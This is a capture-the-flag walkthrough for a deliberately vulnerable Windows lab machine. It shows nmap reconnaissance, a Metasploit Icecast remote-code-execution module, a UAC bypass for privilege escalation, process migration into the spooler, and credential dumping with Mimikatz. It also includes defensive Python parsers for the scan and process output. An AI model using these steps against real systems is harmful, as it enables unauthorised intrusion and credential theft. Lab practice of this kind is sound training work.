Ice

Deploy & hack into a Windows machine, exploiting a very poorly secured media server.

Windows CVE

Room Description

Deploy & hack into a Windows machine, exploiting a very poorly secured media server.

Used Commands & Scripts

Scripts

post/multi/recon/local_exploit_suggester
exploit/windows/local/bypassuac_eventvwr
post/windows/manage/enable_rdp

Commands

sudo nmap -A -sS -oN logfile.txt -vv <target ip>
run post/multi/recon/local_exploit_suggester

Recon

Start enumeration with nmap:
sudo nmap -A -sS -oN logfile.txt -vv <target ip>


Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-15 05:27 EDT
[...]

Not shown: 988 closed ports
Reason: 988 resets
PORT      STATE SERVICE      REASON          VERSION
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped   syn-ack ttl 127
[...]

8000/tcp  open  http         syn-ack ttl 127 Icecast streaming media server
49152/tcp open  unknown      syn-ack ttl 127
49153/tcp open  unknown      syn-ack ttl 127
49154/tcp open  unknown      syn-ack ttl 127
49158/tcp open  unknown      syn-ack ttl 127
49159/tcp open  unknown      syn-ack ttl 127
49160/tcp open  unknown      syn-ack ttl 127
[...]

Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
[...]

Read the log and you should find the following information:

  • the port Microsoft Remote Desktop is running on
  • the name of the service running on port 8000
  • the hostname of the machine
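The three answers can be read straight off the scan, but on an engagement or in a blue-team inventory you parse the -oN file rather than eyeballing it. The following Python is an added example, not part of the room, of nmap or of any tool the room uses: it parses the normal-output port table and the Service Info line shown above (SAMPLE_NMAP is constructed from that output) and returns the hostname, the service reported on port 8000, and the RDP port. Two details of the scan above are handled explicitly: nmap labelled 3389 only as tcpwrapped, so rdp_port falls back to the default RDP port when no open port is identified as ms-wbt-server, and the six "unknown" ports at 49152 and above are grouped by dynamic_rpc_ports, because on Windows that range is the RPC dynamic port range rather than six extra services. The version string on port 8000 is the same text a vulnerability scanner keys off, which is why the room's next step is a CVE search for it.

```python
import re

# Constructed sample: the relevant lines of the nmap -A -sS -vv -oN output
# shown above (only the port table and the Service Info line are needed).
SAMPLE_NMAP = """\
Not shown: 988 closed ports
Reason: 988 resets
PORT      STATE SERVICE      REASON          VERSION
135/tcp   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped   syn-ack ttl 127
8000/tcp  open  http         syn-ack ttl 127 Icecast streaming media server
49152/tcp open  unknown      syn-ack ttl 127
49153/tcp open  unknown      syn-ack ttl 127
49154/tcp open  unknown      syn-ack ttl 127
49158/tcp open  unknown      syn-ack ttl 127
49159/tcp open  unknown      syn-ack ttl 127
49160/tcp open  unknown      syn-ack ttl 127
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
"""

# One row of the port table. The REASON column ("syn-ack ttl 127") is only
# present with -vv or --reason, so it is optional; whatever follows it is
# taken as the version string.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<reason>[a-z][a-z-]*(?:\s+ttl\s+\d+)?))?\s*(?P<version>.*)$"
)
HOST_LINE = re.compile(r"Service Info:.*?Host:\s*(?P<host>[^;]+)")


def parse_nmap_normal(text):
    """Return (list of port dicts, hostname or None) from nmap -oN output."""
    ports, hostname = [], None
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            ports.append({
                "port": int(m["port"]), "proto": m["proto"], "state": m["state"],
                "service": m["service"], "reason": m["reason"] or "",
                "version": m["version"].strip(),
            })
            continue
        h = HOST_LINE.search(line)
        if h:
            hostname = h["host"].strip()
    return ports, hostname


def service_on(ports, number, proto="tcp"):
    """The parsed entry for one port, or None if the scan did not report it."""
    return next((p for p in ports if p["port"] == number and p["proto"] == proto), None)


def rdp_port(ports, default=3389):
    """Port nmap identified as RDP (service ms-wbt-server). When nmap could
    only say 'tcpwrapped', as in the scan above, fall back to the RDP
    default if that port is open."""
    for p in ports:
        if p["state"] == "open" and p["service"] == "ms-wbt-server":
            return p["port"]
    hit = service_on(ports, default)
    return default if hit and hit["state"] == "open" else None


def dynamic_rpc_ports(ports):
    """Open ports in the Windows dynamic range (49152-65535). On a Windows
    host these are normally RPC endpoint listeners, not separate services."""
    return [p["port"] for p in ports if p["state"] == "open" and p["port"] >= 49152]


if __name__ == "__main__":
    ports, host = parse_nmap_normal(SAMPLE_NMAP)
    p8000 = service_on(ports, 8000)
    print(f"hostname: {host}")
    print(f"RDP port: {rdp_port(ports)}")
    print(f"port 8000: {p8000['service']} ({p8000['version']})")
    print(f"dynamic RPC ports: {dynamic_rpc_ports(ports)}")
```

Run the file as-is to see the three answers printed from the embedded sample; point parse_nmap_normal at the contents of logfile.txt to use it on your own scan.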

Gain Access

Search for an existing exploit on one of the exploit databases. I used exploit-db and searched for icecast.

You will find multiple records, but only two of them refer to remote code execution. If you look closely, both refer to the same CVE. Use cvedetails and take the first result for further investigation.

If you land on a page showing a CVSS score of 7.5, you are on the right page. Search for Vulnerability Type(s).

Metasploit

Open a new terminal and start msfconsole. Search for icecast using search icecast. What’s the full path of the exploit? Follow the instructions of the room.

Use the exploit: use 0
Check the options: options
And set the missing parameters: set RHOSTS <target ip>

Finally, check the options again and make sure the parameters are set correctly. Then run the exploit with exploit.

If everything went well you should end up with an opened meterpreter shell.

Escalate

Now, what should we do next? No idea? Run post/multi/recon/local_exploit_suggester in the current session. The result is a list of exploits the target appears to be vulnerable to.

To use one of the suggested exploits, you first need to send the current meterpreter shell to the background by typing background or pressing CTRL-Z. I used CTRL-Z.

Write down the path for the first exploit and use that exploit with:
use exploit/windows/local/bypassuac_eventvwr

Check the options again and set the parameters:
options
set SESSION 1 (usually this should be 1 but can vary)
set LHOST <attacker ip>
exploit

Continue with the room.

Looting

I find the Looting section of that room to be explained pretty simply. This is the reason why I’ll keep it compact.

Show all processes with ps and find the described process. The name of the process you are looking for contains one of the words printer, spool or service.

meterpreter > ps

Process List
============

 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                x64   0
 416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 604   584   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 652   584   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 [...]
 1316  1016  dwm.exe               x64   1        Dark-PC\Dark                  C:\Windows\System32\dwm.exe
 1328  1304  explorer.exe          x64   1        Dark-PC\Dark                  C:\Windows\explorer.exe
 1368  692   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 [...]

Migrate to this process using migrate <process id>. You can find the process id in the PID column.

The migration was successful if you now hold higher permissions. Check this with getuid in the meterpreter session.
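The process listing above is also something a defender reads. The Print Spooler runs as SYSTEM and lives for the whole boot, which is exactly why a session gets migrated into it, and after the migration spoolsv.exe is executing code that its image file never contained. The following Python is an added example, not part of the room or of Metasploit: it parses the meterpreter ps table shown above (SAMPLE_PS is constructed from that listing), picks out the process the room describes by the three keywords, lists the SYSTEM-owned processes worth baselining, and flags any process whose name does not match the file name in its image path. The listing above contains one such row, winlogon.exe reported with an svchost.exe path; whether that is a transcription slip in the writeup or a real observation, it is the kind of inconsistency a monitoring rule should raise.

```python
import re

# Constructed sample: the meterpreter "ps" listing shown above, trimmed.
SAMPLE_PS = r"""
 PID   PPID  Name                  Arch  Session  User                          Path
 ---   ----  ----                  ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                x64   0
 416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 604   584   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 652   584   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 [...]
 1316  1016  dwm.exe               x64   1        Dark-PC\Dark                  C:\Windows\System32\dwm.exe
 1328  1304  explorer.exe          x64   1        Dark-PC\Dark                  C:\Windows\explorer.exe
 1368  692   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
"""

SYSTEM_USER = r"NT AUTHORITY\SYSTEM"


def parse_process_list(text):
    """Parse the column-aligned meterpreter ps table into dicts.
    Columns are separated by two or more spaces, which keeps names such as
    '[System Process]' and users such as 'NT AUTHORITY\\SYSTEM' in one field."""
    procs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or not line[0].isdigit():
            continue  # header, separator, blank and "[...]" lines
        cols = re.split(r"\s{2,}", line)
        if len(cols) < 3:
            continue
        procs.append({
            "pid": int(cols[0]), "ppid": int(cols[1]), "name": cols[2],
            "arch": cols[3] if len(cols) > 3 else None,
            "session": int(cols[4]) if len(cols) > 4 else None,
            "user": cols[5] if len(cols) > 5 else None,
            "path": cols[6] if len(cols) > 6 else None,
        })
    return procs


def find_processes(procs, keywords=("printer", "spool", "service")):
    """Processes whose image name contains any keyword (case-insensitive)."""
    return [p for p in procs if any(k in p["name"].lower() for k in keywords)]


def system_processes(procs):
    """Long-lived SYSTEM-owned processes: the ones a session would be
    migrated into, and therefore the ones whose threads and loaded modules
    a defender should baseline."""
    return [p for p in procs if p["user"] == SYSTEM_USER]


def name_path_mismatches(procs):
    """(name, path) pairs where the image path's file name differs from the
    process name. A legitimate process is named after its image file, so a
    mismatch is a cheap tamper indicator worth an alert."""
    out = []
    for p in procs:
        if not p["path"]:
            continue
        basename = p["path"].replace("\\", "/").rsplit("/", 1)[-1]
        if basename.lower() != p["name"].lower():
            out.append((p["name"], p["path"]))
    return out


if __name__ == "__main__":
    procs = parse_process_list(SAMPLE_PS)
    for p in find_processes(procs):
        print(f"candidate: pid={p['pid']} {p['name']} user={p['user']}")
    print("SYSTEM processes:", [p["name"] for p in system_processes(procs)])
    print("name/path mismatches:", name_path_mismatches(procs))
```

On the sample above find_processes returns only spoolsv.exe (PID 1368, owned by SYSTEM), which is the process the room wants you to migrate into, and name_path_mismatches returns the winlogon.exe row.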

Continue with Mimikatz.

Load Mimikatz with load kiwi and open the help menu with help. A Kiwi Commands section is added to the help menu as part of the loading process.

Run the commands, play around and answer the questions.

Post-Exploitation

Use the help menu to answer the questions.